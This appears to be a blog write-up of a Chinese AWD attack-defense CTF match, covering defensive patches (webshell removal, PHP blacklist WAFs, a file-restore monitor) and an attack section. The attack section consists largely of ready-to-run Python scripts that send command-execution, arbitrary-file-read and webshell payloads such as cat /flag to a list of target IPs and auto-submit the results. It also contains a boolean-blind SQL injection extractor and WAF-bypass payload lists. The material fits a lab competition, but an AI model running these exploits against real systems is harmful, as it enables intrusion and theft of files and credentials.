Yunxi (云曦) October 13 AWD replay

devtools, posted 2024/10/24 21:34:04

I. Defense

1. Change the user password

passwd <user>

2. Change the database password

Enter the database:

mysql -uroot -proot

Change the password:

update mysql.user set password=password('new_password') where user='root';

(This form is for MySQL 5.6 and older, which is what this box runs. On 5.7 the column is authentication_string and on 8.0 the PASSWORD() function no longer exists; there use ALTER USER 'root'@'localhost' IDENTIFIED BY 'new_password'; instead.)

Check the user list and password hashes:

select host,user,password from mysql.user;

Then update the application's config file so it uses the new password (if you skip this the site goes down, because the app can no longer connect).

3. Delete anonymous users (by default there is usually an anonymous login, i.e. a row whose user is empty):

delete from mysql.user where user='';

4. Reload the privilege tables so the changes take effect:

flush privileges;

 

5. Deal with the one-line webshells

Scan with D盾 (D-Shield).

/app/.a.php

A one-line webshell.

Method 1: delete the file

rm .a.php

Method 2: truncate it to empty

echo > .a.php

Method 3: comment the code out

/app/a.php

A one-line webshell plus a call that prints information about the server and the execution environment (phpinfo()-style output).

Handle it the same way as /app/.a.php.

/app/config.php

Comment the backdoor code out (the file is still needed for the database settings, so do not delete it).

/app/index.php

Comment the backdoor code out.

6. Arbitrary file read

/app/about.php

Try it against your own copy of the site first; knowing how it behaves also makes attacking easier later.

Method 1: comment it out (this is not a functional part of the site, so commenting out is fine).

Method 2: write a WAF (in case commenting out would hit a feature):

<?php
// Words to block
$restricted_chars = array("flag");

// Check one input value
function check_input($data) {
    global $restricted_chars;
    foreach ($restricted_chars as $char) {
        if (strpos($data, $char) !== false) {
            // Input contains a restricted word: trigger the firewall action
            block_request();
        }
    }
    return $data;
}

// Block the request
function block_request() {
    http_response_code(403); // return 403 Forbidden
    die("Forbidden");        // stop the script
}

// Check GET data
foreach ($_GET as $key => $value) {
    $_GET[$key] = check_input($value);
}
?>

Upload the file to the app directory. It only takes effect on pages that actually include it (a require at the top of about.php, or PHP's auto_prepend_file for the whole site), so confirm that a request with ?file=/flag really comes back as 403.

Note: the WAF file's name must not contain Chinese characters or it will not be recognized.

Caveat: this is a case-sensitive substring blacklist on the word "flag", checked on GET only. It is a string check, not a file check: if the same file is reachable through a path that never spells the word (a symlink elsewhere on disk, or a glob if the page expands one), the check does nothing. The robust fix is to allow only known page files under a fixed directory.

/app/contact.php

Handle it the same way as /app/about.php (its parameter is ?path= rather than ?file=, so test that one).

7. Command execution

/app/footer.php

The command arrives in a POST parameter (shell).

Method 1: comment it out

Method 2: WAF

<?php
// Words to block
$restricted_chars = array("cat","flag","ls");

// Check one input value
function check_input($data) {
    global $restricted_chars;
    foreach ($restricted_chars as $char) {
        if (strpos($data, $char) !== false) {
            // Input contains a restricted word: trigger the firewall action
            block_request();
        }
    }
    return $data;
}

// Block the request
function block_request() {
    http_response_code(403); // return 403 Forbidden
    die("Forbidden");        // stop the script
}

// Check POST data
foreach ($_POST as $key => $value) {
    $_POST[$key] = check_input($value);
}
?>

/app/admin/footer.php

Handle it the same way as /app/footer.php.

/app/admin/header.php

The command arrives in a GET parameter (p).

Method 1: comment it out

Method 2: write a WAF

<?php
// Words to block
$restricted_chars = array("cat","flag","ls");

// Check one input value
function check_input($data) {
    global $restricted_chars;
    foreach ($restricted_chars as $char) {
        if (strpos($data, $char) !== false) {
            // Input contains a restricted word: trigger the firewall action
            block_request();
        }
    }
    return $data;
}

// Block the request
function block_request() {
    http_response_code(403); // return 403 Forbidden
    die("Forbidden");        // stop the script
}

// Check GET data
foreach ($_GET as $key => $value) {
    $_GET[$key] = check_input($value);
}
?>

Caveat: a blacklist on "cat", "flag" and "ls" buys a few minutes, not safety. The command still reaches system(), and the shell happily runs tac /fl''ag or head /f* without either word ever appearing in the request; meanwhile any legitimate parameter containing "ls" (for example "details") is rejected. If commenting out is at all possible, remove the sink rather than filter its input.
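To make the caveats on the two WAFs above concrete, the following added example (mine, not the post's code) reimplements the substring check in Python, runs a set of constructed command payloads through it to show which ones pass, and contrasts it with the allowlist approach for the file-read pages: resolve the requested name under a fixed page directory and refuse anything that escapes it. The page directory and the "flag" file it creates are constructed for the demo.

```python
import os
import tempfile

RESTRICTED = ("cat", "flag", "ls")  # the post's blacklist for the command-execution WAF


def blacklist_blocks(value, restricted=RESTRICTED):
    """The WAF's check: block when any restricted word is a substring (strpos() !== false)."""
    return any(word in value for word in restricted)


# Constructed payloads an attacker would try against footer.php ?shell= / header.php ?p=.
BYPASS_CANDIDATES = [
    "cat /flag",             # blocked: contains 'cat' and 'flag'
    "tac /flag",             # blocked: still contains 'flag'
    "tac /fl''ag",           # quote splitting: the shell joins fl''ag back into flag
    "tac /fl*",              # glob expansion happens in the shell, after the WAF
    "head /f???",            # glob again, no forbidden substring at all
    "c''at /fl''ag",
    "/bin/ca\\t /fl\\ag",    # backslash escapes, removed by the shell
    "base64 /f*",
]


def bypasses(candidates=BYPASS_CANDIDATES, restricted=RESTRICTED):
    """Payloads the blacklist lets through."""
    return [p for p in candidates if not blacklist_blocks(p, restricted)]


def resolve_page(base_dir, requested):
    """Allowlist alternative for about.php ?file= / contact.php ?path=:
    only regular files that live below base_dir after symlink/.. resolution."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None  # escaped the page directory (absolute path, .., symlink)
    if not os.path.isfile(target):
        return None  # directories, devices, missing files
    return target


def make_demo_pages():
    """Constructed page directory: one legitimate include and a 'flag' file outside it."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    with open(os.path.join(pages, "about.html"), "w") as fh:
        fh.write("<h1>About</h1>\n")
    with open(os.path.join(root, "flag"), "w") as fh:
        fh.write("flag{demo}\n")
    return pages


if __name__ == "__main__":
    for payload in BYPASS_CANDIDATES:
        print(f"{'BLOCKED' if blacklist_blocks(payload) else 'passes ':8} {payload}")
    print("false positive on 'ls':", blacklist_blocks("details"))
    pages = make_demo_pages()
    for req in ("about.html", "/flag", "../flag", "about.html/../../flag"):
        print(f"{req:24} -> {resolve_page(pages, req)}")
```

The point of resolve_page is that it never looks at the string at all: whatever encoding or spelling the attacker uses, the kernel resolves it to one canonical path and the only question is whether that path is inside the directory you intended to serve.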

8. SQL injection

/app/search.php

Method 1: scan with sqlmap; it finds the injection point (union-based, boolean-blind, time-blind, and …).

Method 2: manual testing (I'm not great at it and only found the boolean blind).

True page (screenshot)

False page (screenshot)

Put a WAF in front of it. The real fix is to make the query a prepared statement with the search term bound as a parameter; the WAF is the stopgap when you cannot safely touch the query.

/app/login.php
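The post does not show search.php's query, only that a true page and a false page exist. The following added example (mine, not the post's code) models the usual string-concatenated LIKE query in Python with sqlite3, shows the parameterized version beside it, and drives a boolean-blind extraction against the vulnerable one using exactly that true/false difference. The schema, rows and the admin password are constructed for the demo, not the box's real data.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the box's database (schema and rows invented for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products(name) VALUES ('apple'), ('banana'), ('cherry');
        CREATE TABLE admin(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO admin(username, password) VALUES ('admin', 's3cret!');
        """
    )
    return conn


def search_vuln(conn, q):
    """String-concatenated query: the pattern behind search.php (assumed, not its source)."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + q + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, q):
    """Parameterized fix: the input can only ever be the LIKE pattern, never SQL."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + q + "%",))]


def inject(cond):
    """Turn a boolean condition into a search term.  'xq' makes the LIKE itself fail
    and the trailing OR 'x'=' swallows the closing %' the page appends, so the result
    set is non-empty exactly when cond holds (the 'true page')."""
    return f"xq' OR {cond} OR 'x'='"


def blind_extract(oracle, column, table, max_len=64):
    """Boolean-blind extraction: oracle(term) is True when the true page comes back.
    Each character is found by binary search over printable ASCII (7 requests/char)."""
    value = ""
    sub = f"(SELECT {column} FROM {table} LIMIT 1)"
    for pos in range(1, max_len + 1):
        if not oracle(inject(f"length({sub})>={pos}")):
            break  # past the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(inject(f"unicode(substr({sub},{pos},1))>{mid}")):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    conn = make_db()
    print("normal :", search_vuln(conn, "an"))
    print("vuln   :", search_vuln(conn, inject("1=1")))
    print("safe   :", search_safe(conn, inject("1=1")))
    print("blind  :", blind_extract(lambda t: bool(search_vuln(conn, t)), "password", "admin"))
    print("blind vs safe:", repr(blind_extract(lambda t: bool(search_safe(conn, t)), "password", "admin")))
```

Against the parameterized version the same oracle never sees a true page, so extraction stops at the first character. That is the test to run on your own box after patching: the true/false pair from the screenshots should collapse into a single false page.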

9. Change the backend login password

First connect to your own database with Navicat.

Note the port is 3306; don't be misled by the mysql_port value in the config.

Once connected, open the admin table and change the backend password.

10. Information disclosure

Logging into the backend gives the flag directly.

Looking at /app/admin/index.php, there is a block of PHP code that executes a command.

Comment it out.

11. File upload

After logging into the backend there is a file upload feature.

Upload a file to confirm how it behaves.

/app/admin/upload.php

Deploy a file-upload monitoring script.
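The post says to deploy a monitoring script but does not show one. The following is an added example (mine, not the post's): it assumes a clean copy of the web root was taken before the match (something like cp -r /app /app_bak; the backup path is an assumption), hashes every file in both trees, and on each poll moves newly appeared files into a quarantine directory so the attacker's payload can still be read, while modified or deleted files are copied back from the backup. The demo scenario it builds (an uploaded shell plus a backdoored index.php) is constructed in a temporary directory.

```python
import hashlib
import os
import shutil
import sys
import tempfile
import time


def file_hash(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """relative path -> SHA-256 for every regular file under root (symlinks skipped)."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            state[os.path.relpath(full, root)] = file_hash(full)
    return state


def diff_snapshots(baseline, current):
    """Return (added, modified, removed) relative paths, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return added, modified, removed


def restore(web_root, backup_root, added, modified, removed, quarantine=None):
    """Undo the drift: new files are moved to quarantine (or deleted), modified and
    deleted files are copied back from the clean backup."""
    for rel in added:
        src = os.path.join(web_root, rel)
        if quarantine:
            os.makedirs(quarantine, exist_ok=True)
            dst = os.path.join(quarantine, rel.replace(os.sep, "_") + "." + str(int(time.time())))
            shutil.move(src, dst)
        else:
            os.remove(src)
    for rel in modified + removed:
        dst = os.path.join(web_root, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(os.path.join(backup_root, rel), dst)


def watch(web_root, backup_root, interval=1.0, quarantine=None):
    """Poll loop: compare the live tree against the backup and revert any change."""
    baseline = snapshot(backup_root)
    while True:
        added, modified, removed = diff_snapshots(baseline, snapshot(web_root))
        if added or modified or removed:
            print(time.strftime("%Y-%m-%d %H:%M:%S"), "added", added, "modified", modified, "removed", removed)
            restore(web_root, backup_root, added, modified, removed, quarantine)
        time.sleep(interval)


def run_demo():
    """Constructed scenario: clean copy taken, then a shell is uploaded and index.php is backdoored."""
    work = tempfile.mkdtemp()
    web = os.path.join(work, "app")
    backup = os.path.join(work, "app_bak")
    os.makedirs(os.path.join(web, "admin"))
    with open(os.path.join(web, "index.php"), "w") as fh:
        fh.write("<?php echo 'home'; ?>\n")
    with open(os.path.join(web, "admin", "upload.php"), "w") as fh:
        fh.write("<?php /* upload form */ ?>\n")
    shutil.copytree(web, backup)  # the pre-match backup
    with open(os.path.join(web, "admin", "x.php"), "w") as fh:  # attacker's upload
        fh.write("<?php @eval($_POST['c']); ?>\n")
    with open(os.path.join(web, "index.php"), "a") as fh:  # attacker appends a backdoor
        fh.write("<?php @eval($_GET['c']); ?>\n")
    added, modified, removed = diff_snapshots(snapshot(backup), snapshot(web))
    restore(web, backup, added, modified, removed, quarantine=os.path.join(work, "quarantine"))
    result = {
        "added": added, "modified": modified, "removed": removed,
        "clean_after_restore": snapshot(web) == snapshot(backup),
        "quarantined": sorted(os.listdir(os.path.join(work, "quarantine"))),
    }
    shutil.rmtree(work)
    return result


if __name__ == "__main__":
    if len(sys.argv) >= 3:
        watch(sys.argv[1], sys.argv[2], quarantine=sys.argv[3] if len(sys.argv) > 3 else None)
    else:
        print(run_demo())
```

Run as `python monitor.py /app /app_bak /root/quarantine` and leave it in a screen or tmux session. Take the backup only after your own patches are in place, otherwise the watcher will faithfully restore the holes; re-copy to the backup whenever you patch again.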

II. Attack

1. Scan the web ports

nmap <ip> -p <range>

2. Connect to the database

See whether Navicat can connect to the database directly without a password (if the database password hasn't been changed).

3. Backdoors

/app/.a.php

Write an automated exploit:

import requests
import time
import schedule
import os

payload = "?c=system('cat /flag');"
page = ".a.php"
urls = [
    'http://172.16.17.202:10250/',
    'http://172.16.17.202:10298/',
    'http://172.16.17.202:10869/',
    'http://172.16.17.202:12186/',
    'http://172.16.17.202:12232/',
    'http://172.16.17.202:12750/',
    'http://172.16.17.202:14219/',
    'http://172.16.17.202:15054/',
    'http://172.16.17.202:16767/',
    'http://172.16.17.202:17365/',
    'http://172.16.17.202:18922/',
]


def get_flag():
    for url in urls:
        n_url = url + page + payload
        # print(n_url)
        try:
            response = requests.get(url=n_url, timeout=5)
        except requests.RequestException:
            continue  # target down or patched: move on to the next one
        if response.status_code == 200:
            # split the page source into lines
            lines = response.text.split('\n')
            # the flag is on the first line
            choice_line = lines[0]
            with open('hm_flag1.txt', 'a', encoding='utf-8') as file:
                file.write(choice_line + '\n')


def support_flag():
    if not os.path.exists('hm_flag1.txt'):
        return  # nothing collected this round
    with open('hm_flag1.txt', 'r', encoding='utf-8') as file:
        content = file.read()
    # print(content)
    for line in content.split('\n'):
        if not line:
            continue  # skip the empty trailing line
        # print(line)
        url = 'http://172.16.17.202:9090/'
        data = {"flag": line, "token": "4300f7f61934925694f6138f3045e61e"}
        response = requests.post(url, data=data)
        # print(response.text)
        time.sleep(1)
    # delete the file once every flag has been submitted
    os.remove('hm_flag1.txt')


def job():
    # global flag tracking whether this is the first run
    global first_run
    get_flag()
    support_flag()
    print(time.strftime("%Y-%m-%d %H:%M:%S"))
    if first_run:
        # run every five minutes from now on
        schedule.every(5).minutes.do(job)
        first_run = False


if __name__ == '__main__':
    first_run = True
    job()
    while True:
        schedule.run_pending()
        time.sleep(1)
/app/a.php
import requests
import time
import schedule
import os

payload = "?c=system('cat /flag');"
page = "a.php"
urls = [
    'http://172.16.17.202:10250/',
    'http://172.16.17.202:10298/',
    'http://172.16.17.202:10869/',
    'http://172.16.17.202:12186/',
    'http://172.16.17.202:12232/',
    'http://172.16.17.202:12750/',
    'http://172.16.17.202:14219/',
    'http://172.16.17.202:15054/',
    'http://172.16.17.202:16767/',
    'http://172.16.17.202:17365/',
    'http://172.16.17.202:18922/',
]


def get_flag():
    for url in urls:
        n_url = url + page + payload
        # print(n_url)
        try:
            response = requests.get(url=n_url, timeout=5)
        except requests.RequestException:
            continue  # target down or patched: move on to the next one
        if response.status_code == 200:
            # split the page source into lines
            lines = response.text.split('\n')
            # the flag is on the first line
            choice_line = lines[0]
            # strip the xdebug wrapper that a.php prints around the output
            comment = "<pre class='xdebug-var-dump' dir='ltr'>"
            cleaned_line = choice_line.replace(comment, "")
            with open('hm_flag2.txt', 'a', encoding='utf-8') as file:
                file.write(cleaned_line + '\n')


def support_flag():
    if not os.path.exists('hm_flag2.txt'):
        return  # nothing collected this round
    with open('hm_flag2.txt', 'r', encoding='utf-8') as file:
        content = file.read()
    # print(content)
    for line in content.split('\n'):
        if not line:
            continue  # skip the empty trailing line
        # print(line)
        url = 'http://172.16.17.202:9090/'
        data = {"flag": line, "token": "4300f7f61934925694f6138f3045e61e"}
        response = requests.post(url, data=data)
        # print(response.text)
        time.sleep(1)
    # delete the file once every flag has been submitted
    os.remove('hm_flag2.txt')


def job():
    # global flag tracking whether this is the first run
    global first_run
    get_flag()
    support_flag()
    print(time.strftime("%Y-%m-%d %H:%M:%S"))
    if first_run:
        # run every five minutes from now on
        schedule.every(5).minutes.do(job)
        first_run = False


if __name__ == '__main__':
    first_run = True
    job()
    while True:
        schedule.run_pending()
        time.sleep(1)

/app/config.php

Same as /app/.a.php (with page = "config.php").

/app/index.php

Same as /app/a.php, but take line 83 (lines[82]) and strip <!-- banner --> instead of the xdebug wrapper.

4. Arbitrary file read

/app/about.php

import requests
import time
import schedule
import os

payload = "?file=/flag"
page = "about.php"
urls = [
    'http://172.16.17.202:10250/',
    'http://172.16.17.202:10298/',
    'http://172.16.17.202:10869/',
    'http://172.16.17.202:12186/',
    'http://172.16.17.202:12232/',
    'http://172.16.17.202:12750/',
    'http://172.16.17.202:14219/',
    'http://172.16.17.202:15054/',
    'http://172.16.17.202:16767/',
    'http://172.16.17.202:17365/',
    'http://172.16.17.202:18922/',
]


def get_flag():
    for url in urls:
        n_url = url + page + payload
        # print(n_url)
        try:
            response = requests.get(url=n_url, timeout=5)
        except requests.RequestException:
            continue  # target down or patched: move on to the next one
        if response.status_code == 200:
            # split the page source into lines
            lines = response.text.split('\n')
            # the flag is on the first line
            choice_line = lines[0]
            # strip the HTML comment that precedes it
            comment = "<!-- banner -->"
            cleaned_line = choice_line.replace(comment, "")
            with open('ry_flag1.txt', 'a', encoding='utf-8') as file:
                file.write(cleaned_line + '\n')


def support_flag():
    if not os.path.exists('ry_flag1.txt'):
        return  # nothing collected this round
    with open('ry_flag1.txt', 'r', encoding='utf-8') as file:
        content = file.read()
    # print(content)
    for line in content.split('\n'):
        if not line:
            continue  # skip the empty trailing line
        # print(line)
        url = 'http://172.16.17.202:9090/'
        data = {"flag": line, "token": "4300f7f61934925694f6138f3045e61e"}
        response = requests.post(url, data=data)
        # print(response.text)
        time.sleep(1)
    # delete the file once every flag has been submitted
    os.remove('ry_flag1.txt')


def job():
    # global flag tracking whether this is the first run
    global first_run
    get_flag()
    support_flag()
    print(time.strftime("%Y-%m-%d %H:%M:%S"))
    if first_run:
        # run every five minutes from now on
        schedule.every(5).minutes.do(job)
        first_run = False


if __name__ == '__main__':
    first_run = True
    job()
    while True:
        schedule.run_pending()
        time.sleep(1)

/app/contact.php
import requests
import time
import schedule
import os

payload = "?path=/flag"
page = "contact.php"
urls = [
    'http://172.16.17.202:10250/',
    'http://172.16.17.202:10298/',
    'http://172.16.17.202:10869/',
    'http://172.16.17.202:12186/',
    'http://172.16.17.202:12232/',
    'http://172.16.17.202:12750/',
    'http://172.16.17.202:14219/',
    'http://172.16.17.202:15054/',
    'http://172.16.17.202:16767/',
    'http://172.16.17.202:17365/',
    'http://172.16.17.202:18922/',
]


def get_flag():
    for url in urls:
        n_url = url + page + payload
        # print(n_url)
        try:
            response = requests.get(url=n_url, timeout=5)
        except requests.RequestException:
            continue  # target down or patched: move on to the next one
        if response.status_code == 200:
            # split the page source into lines
            lines = response.text.split('\n')
            if len(lines) < 83:
                continue  # patched page or WAF text: the flag line is not there
            # the flag is on line 83
            choice_line = lines[82]
            # strip the HTML comment that precedes it
            comment = "<!-- banner -->"
            cleaned_line = choice_line.replace(comment, "")
            with open('ry_flag2.txt', 'a', encoding='utf-8') as file:
                file.write(cleaned_line + '\n')


def support_flag():
    if not os.path.exists('ry_flag2.txt'):
        return  # nothing collected this round
    with open('ry_flag2.txt', 'r', encoding='utf-8') as file:
        content = file.read()
    # print(content)
    for line in content.split('\n'):
        if not line:
            continue  # skip the empty trailing line
        # print(line)
        url = 'http://172.16.17.202:9090/'
        data = {"flag": line, "token": "4300f7f61934925694f6138f3045e61e"}
        response = requests.post(url, data=data)
        # print(response.text)
        time.sleep(1)
    # delete the file once every flag has been submitted
    os.remove('ry_flag2.txt')


def job():
    # global flag tracking whether this is the first run
    global first_run
    get_flag()
    support_flag()
    print(time.strftime("%Y-%m-%d %H:%M:%S"))
    if first_run:
        # run every five minutes from now on
        schedule.every(5).minutes.do(job)
        first_run = False


if __name__ == '__main__':
    first_run = True
    job()
    while True:
        schedule.run_pending()
        time.sleep(1)

5. Command execution

/app/footer.php

import requests
import time
import schedule
import os

page = "footer.php"
urls = [
    'http://172.16.17.202:10250/',
    'http://172.16.17.202:10298/',
    'http://172.16.17.202:10869/',
    'http://172.16.17.202:12186/',
    'http://172.16.17.202:12232/',
    'http://172.16.17.202:12750/',
    'http://172.16.17.202:14219/',
    'http://172.16.17.202:15054/',
    'http://172.16.17.202:16767/',
    'http://172.16.17.202:17365/',
    'http://172.16.17.202:18922/',
]


def get_flag():
    for url in urls:
        n_url = url + page
        # print(n_url)
        data = {"shell": "cat /flag"}
        try:
            response = requests.post(url=n_url, data=data, timeout=5)
        except requests.RequestException:
            continue  # target down or patched: move on to the next one
        if response.status_code == 200:
            # split the page source into lines
            lines = response.text.split('\n')
            # the flag is on the first line
            choice_line = lines[0]
            with open('rce_flag1.txt', 'a', encoding='utf-8') as file:
                file.write(choice_line + '\n')


def support_flag():
    if not os.path.exists('rce_flag1.txt'):
        return  # nothing collected this round
    with open('rce_flag1.txt', 'r', encoding='utf-8') as file:
        content = file.read()
    # print(content)
    for line in content.split('\n'):
        if not line:
            continue  # skip the empty trailing line
        # print(line)
        url = 'http://172.16.17.202:9090/'
        data = {"flag": line, "token": "4300f7f61934925694f6138f3045e61e"}
        response = requests.post(url, data=data)
        # print(response.text)
        time.sleep(1)
    # delete the file once every flag has been submitted
    os.remove('rce_flag1.txt')


def job():
    # global flag tracking whether this is the first run
    global first_run
    get_flag()
    support_flag()
    print(time.strftime("%Y-%m-%d %H:%M:%S"))
    if first_run:
        # run every five minutes from now on
        schedule.every(5).minutes.do(job)
        first_run = False


if __name__ == '__main__':
    first_run = True
    job()
    while True:
        schedule.run_pending()
        time.sleep(1)
/app/admin/footer.php

Same as /app/footer.php (with page = "admin/footer.php").

/app/admin/header.php
import requests
import time
import schedule
import os

payload = "?p=cat%20/flag"
page = "admin/header.php"
urls = [
    'http://172.16.17.202:10250/',
    'http://172.16.17.202:10298/',
    'http://172.16.17.202:10869/',
    'http://172.16.17.202:12186/',
    'http://172.16.17.202:12232/',
    'http://172.16.17.202:12750/',
    'http://172.16.17.202:14219/',
    'http://172.16.17.202:15054/',
    'http://172.16.17.202:16767/',
    'http://172.16.17.202:17365/',
    'http://172.16.17.202:18922/',
]


def get_flag():
    for url in urls:
        n_url = url + page + payload
        # print(n_url)
        try:
            response = requests.get(url=n_url, timeout=5)
        except requests.RequestException:
            continue  # target down or patched: move on to the next one
        if response.status_code == 200:
            # split the page source into lines
            lines = response.text.split('\n')
            # the flag is on the first line
            choice_line = lines[0]
            # strip the echoed command and the xdebug var_dump wrapper around the flag
            comments = [
                "cat /flag<pre class='xdebug-var-dump' dir='ltr'><small>string</small> <font color='#cc0000'>'",
                "'</font> <i>(length=32)</i>",
            ]
            cleaned_line = choice_line
            for comment in comments:
                cleaned_line = cleaned_line.replace(comment, "")
            with open('rce_flag3.txt', 'a', encoding='utf-8') as file:
                file.write(cleaned_line + '\n')


def support_flag():
    if not os.path.exists('rce_flag3.txt'):
        return  # nothing collected this round
    with open('rce_flag3.txt', 'r', encoding='utf-8') as file:
        content = file.read()
    # print(content)
    for line in content.split('\n'):
        if not line:
            continue  # skip the empty trailing line
        # print(line)
        url = 'http://172.16.17.202:9090/'
        data = {"flag": line, "token": "4300f7f61934925694f6138f3045e61e"}
        response = requests.post(url, data=data)
        # print(response.text)
        time.sleep(1)
    # delete the file once every flag has been submitted
    os.remove('rce_flag3.txt')


def job():
    # global flag tracking whether this is the first run
    global first_run
    get_flag()
    support_flag()
    print(time.strftime("%Y-%m-%d %H:%M:%S"))
    if first_run:
        # run every five minutes from now on
        schedule.every(5).minutes.do(job)
        first_run = False


if __name__ == '__main__':
    first_run = True
    job()
    while True:
        schedule.run_pending()
        time.sleep(1)
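The scripts above are one loop repeated with a different page, parameter, output file and line number, and each copy must be kept running separately. As an added example that goes beyond the post (mine, not the post's code; standard library only, so it needs neither requests nor schedule), the following folds them into one table-driven runner: every hole is a row, a single transport function does the fetching with a timeout so a patched or dead box cannot stall the round, the flag is located by a regex after stripping HTML rather than by line index, the first hole that works on a target ends the scan of that target, and flags are de-duplicated before submission. The targets, token and submission URL are the ones in the post; the flag{...} format, the *.example hosts and their canned responses are assumptions for the offline demo.

```python
import html
import re
import time
import urllib.parse
import urllib.request

# Values from the post: submission endpoint, team token and the opponent list.
SUBMIT_URL = "http://172.16.17.202:9090/"
TOKEN = "4300f7f61934925694f6138f3045e61e"
TARGETS = [f"http://172.16.17.202:{p}/" for p in
           (10250, 10298, 10869, 12186, 12232, 12750, 14219, 15054, 16767, 17365, 18922)]

# One row per hole the post exploits: (name, page, method, parameter, payload).
EXPLOITS = [
    ("hm1", ".a.php", "GET", "c", "system('cat /flag');"),
    ("hm2", "a.php", "GET", "c", "system('cat /flag');"),
    ("hm3", "config.php", "GET", "c", "system('cat /flag');"),
    ("hm4", "index.php", "GET", "c", "system('cat /flag');"),
    ("ry1", "about.php", "GET", "file", "/flag"),
    ("ry2", "contact.php", "GET", "path", "/flag"),
    ("rce1", "footer.php", "POST", "shell", "cat /flag"),
    ("rce2", "admin/footer.php", "POST", "shell", "cat /flag"),
    ("rce3", "admin/header.php", "GET", "p", "cat /flag"),
]

# Assumed flag format; the post's scripts instead take a fixed line and strip wrappers.
FLAG_RE = re.compile(r"flag\{[^{}\s]+\}")
TAG_RE = re.compile(r"<[^>]+>")


def extract_flag(body):
    """Drop tags (xdebug <pre>/<font> wrappers, the <!-- banner --> comment), then regex the flag."""
    text = html.unescape(TAG_RE.sub("", body))
    m = FLAG_RE.search(text)
    return m.group(0) if m else None


def build_request(base, exploit):
    """(method, url, body) for one exploit row against one target; urlencode does the quoting."""
    _name, page, method, param, payload = exploit
    if method == "GET":
        return "GET", base + page + "?" + urllib.parse.urlencode({param: payload}), None
    return "POST", base + page, urllib.parse.urlencode({param: payload}).encode()


def http_fetch(method, url, body, timeout=5):
    """Real transport. Any failure (box down, 403 from a WAF, timeout) becomes an empty body."""
    req = urllib.request.Request(url, data=body, method=method)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return ""


def run_round(targets, exploits, fetch=http_fetch, seen=None):
    """Try each exploit on each target until one yields a flag not submitted before."""
    seen = set() if seen is None else seen
    found = {}
    for base in targets:
        for exploit in exploits:
            flag = extract_flag(fetch(*build_request(base, exploit)))
            if flag and flag not in seen:
                seen.add(flag)
                found[base] = flag
                break  # one flag per target per round is all the scoreboard takes
    return found


def submit(flag, fetch=http_fetch):
    body = urllib.parse.urlencode({"flag": flag, "token": TOKEN}).encode()
    return fetch("POST", SUBMIT_URL, body)


# Constructed responses standing in for two opponent boxes (no network): host a is only
# vulnerable to the about.php file read, host b only to the footer.php command execution.
DEMO_TARGETS = ["http://a.example/", "http://b.example/"]


def demo_fetch(method, url, body, timeout=5):
    if method == "GET" and url == "http://a.example/about.php?file=%2Fflag":
        return "<!-- banner -->flag{aaaaaaaa}\n<html><body>about</body></html>"
    if method == "POST" and url == "http://b.example/footer.php" and body == b"shell=cat+%2Fflag":
        return "<pre class='xdebug-var-dump' dir='ltr'>string 'flag{bbbbbbbb}' (length=14)</pre>"
    return "Forbidden"


if __name__ == "__main__":
    seen = set()
    while True:
        for base, flag in run_round(TARGETS, EXPLOITS, seen=seen).items():
            print(time.strftime("%Y-%m-%d %H:%M:%S"), base, flag, submit(flag))
        time.sleep(300)  # five-minute rounds, as in the post's scripts
```

When a team patches one hole, the loop simply falls through to the next row for that target, which is the main thing the per-hole scripts could not do. If the real flag format differs, only FLAG_RE changes.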


http://www.ppmy.cn/devtools/128518.html
